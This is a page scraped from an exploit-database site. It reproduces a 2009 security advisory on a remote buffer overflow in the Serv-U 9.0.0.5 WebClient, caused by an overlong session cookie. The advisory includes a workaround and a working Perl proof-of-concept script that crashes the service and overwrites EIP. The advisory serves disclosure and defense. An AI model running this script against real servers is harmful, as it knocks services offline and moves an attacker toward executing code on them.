0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Serv-u web client 9.0.0.5 buffer overflow
========================================= Serv-u web client 9.0.0.5 buffer overflow ========================================= # Title: Serv-u web client 9.0.0.5 buffer overflow # CVE-ID: () # OSVDB-ID: () # Author: Nikolas Rangos # Published: 2009-11-02 # Verified: yes view source print? -- KC Security PUBLIC ADVISORY -- http://www.rangos.de -- 11-01-2009 RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow Background ------------ Serv-U includes a simple, browser-based transfer client perfect for every business environment. The Web Client is accessed through a standard web browser and features an unintimidating, familiar interface. It is a great way for sharing photos and image files with clients and co-workers due to its configurable thumbnail view that allows remote images to be quickly viewed without downloading the entire file. An additional slideshow view offers a fast way to share a collection of photos from your latest projects. When using Serv-U, photo sharing sites and large email attachments are a thing of the past! Description ------------ Remote exploitation of a buffer overflow in the Serv-U WebClient may allow attackers to execute arbitrary code. The problem lies in the handling of overly long Session Cookies. When a very long session cookie is sent to the Serv-U WebClient HTTP Service an overrun occurs and EIP becomes "overwritten". Detection ------------ KC Security confirmed the vulnerability in the latest version of Serv-U WebClient which is 9.0.0.5. Workaround ------------ Disable the WebClient Service and use the Serv-U FTP/SFTP components only. Proof of concept ------------ The following PERL script will crash the Serv-U.exe service and overwrite EIP with 0xAAAAAAAA. ---snip--- use IO::Socket; $|=1; $a = "A" x 100000; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '80', Proto => 'tcp'); print $sock "POST / HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n" ."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" ."Content-Length: 0\r\n\r\n"; while (<$sock>) { print; } # 0day.today [2024-07-02] #